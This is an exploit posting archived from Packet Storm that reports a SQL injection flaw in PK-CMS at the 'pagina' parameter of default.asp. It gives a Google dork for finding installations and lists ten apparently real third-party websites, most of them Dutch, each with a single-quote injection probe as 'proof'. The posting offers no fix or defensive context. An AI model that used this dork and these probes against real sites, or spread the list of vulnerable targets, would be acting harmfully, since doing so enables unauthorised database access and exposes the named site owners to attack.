PK-CMS SQL Injection

2013-09-03T00:00:00
ID PACKETSTORM:123061
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-03T00:00:00

Description

                                        
                                            `#**************************************************************  
# [+] Exploit Title : PK-CMS Sql injection vulnerability  
#  
# [+] Software link : www.passoft-webdev.nl  
#  
# [+] Exploit Author : Ashiyane Digital Security Team  
#  
# [+] Tested on: Windows 7 , Linux  
#  
# [+] Google Dork : intext:"Powered by PK-CMS"  
#  
# [+] Date: 2013/09/01  
#  
--------------------------------------------------------------------  
# [+] Exploit : Sql Injection  
#  
# [+] Location : [Target]/default.asp?pagina=[Sql injection]  
#  
#-------  
# Proof:  
#-------  
#  
# http://www.clubtropicana.es/default.asp?pagina=1'  
#  
# http://www.charitas-nederland.nl//default.asp?pagina=1'  
#  
# http://www.dranadministraties.nl/default.asp?pagina=1'  
#  
# http://www.doij.nl/default.asp?pagina=1'  
#  
# http://www.familie-pool.nl/default.asp?pagina=1'  
#  
# http://www.hessenrijders.nl//default.asp?pagina=1'  
#  
# http://www.halberg.nl/default.asp?pagina=1'  
#  
# http://www.huurdershevo.nl//default.asp?pagina=1'  
#  
# http://www.galerielefournil.nl/default.asp?pagina=1'  
#  
# http://www.slangenburg.nl/default.asp?pagina=1'  
#  
#  
######################  
discovered by : ACC3SS  
######################  
`